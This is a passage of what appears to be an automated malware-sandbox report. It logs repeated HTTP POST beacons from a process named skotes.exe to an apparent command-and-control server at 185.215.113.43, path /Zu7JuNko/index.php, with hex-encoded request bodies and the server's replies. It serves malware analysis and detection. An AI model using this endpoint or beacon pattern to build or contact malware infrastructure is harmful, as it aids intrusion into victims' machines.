                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    51192.168.2.550196185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:09.975229979 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:11.398477077 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:11 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    52192.168.2.550207185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:13.036607981 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:14.399468899 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:14 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    53192.168.2.550228185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:16.152431965 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:17.492866039 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:17 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    54192.168.2.550235185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:19.131704092 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:20.525924921 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:20 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    55192.168.2.550239185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:22.274375916 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:23.712764978 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:23 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    56192.168.2.550240185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:25.382942915 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:26.708947897 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:26 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    57192.168.2.550252185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:28.460587025 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:29.805591106 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    58192.168.2.550275185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:31.449347019 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:32.797910929 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    59192.168.2.550296185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:34.552690983 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:35.940511942 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    60192.168.2.550306185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:37.569524050 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:38.952680111 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:38 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    61192.168.2.550310185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:40.693546057 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:42.082746029 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    62192.168.2.550323185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:43.709630966 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:45.101988077 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    63192.168.2.550336185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:46.851939917 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:48.229470015 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:48 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    64192.168.2.550343185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:49.865668058 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:51.257313013 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    65192.168.2.550345185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:52.993266106 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:54.323214054 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:15:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    66192.168.2.550348185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:15:55.959598064 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
